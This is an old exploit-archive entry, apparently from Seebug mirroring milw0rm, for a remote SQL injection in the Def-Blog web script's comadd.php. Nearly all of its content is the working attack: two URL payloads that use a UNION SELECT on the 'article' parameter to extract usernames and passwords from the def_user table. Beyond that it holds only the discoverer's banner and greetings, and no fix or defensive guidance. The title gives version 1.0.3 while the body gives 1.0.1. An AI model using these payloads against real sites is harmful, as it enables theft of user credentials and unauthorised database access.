Def-Blog <= 1.0.3 (comadd.php) Remote SQL Injection Vulnerability

2006-10-15T00:00:00
ID SSV:16680
Type seebug
Reporter Root
Modified 2006-10-15T00:00:00

Description

No description provided by source.

                                        
                                            
                                                #==============================================================================================
#Def-Blog <= v1.0.1 (article) Remote SQL Injection Exploit
#===============================================================================================
#                                                                     
#Critical Level : Dangerous                                           
#                                                                     
#Venedor site : http://www.easy-script.com/Def_Blog_V.1.0.1.zip    
#                                                                     
#Version : v1.0.1                                           
#                                                       
#
#Exploit :
#--------------------------------
#
#FOR USER : comadd.php?article=-1%20union%20select%20null,pseudo%20from%20def_user
#FOR PASS : comadd.php?article=-1%20union%20select%20null,mdp%20from%20def_user
#
#================================================================================================
#Discoverd By : SHiKaA
#
#Conatact : SHiKaA-[at]hotmail.com
#
#Thx To : Str0ke & SuperRomio & XoRon & MDx & Simo
# sPECial THanks to : Coder-AZH@CKTEAM
==================================================================================================

# milw0rm.com [2006-10-15]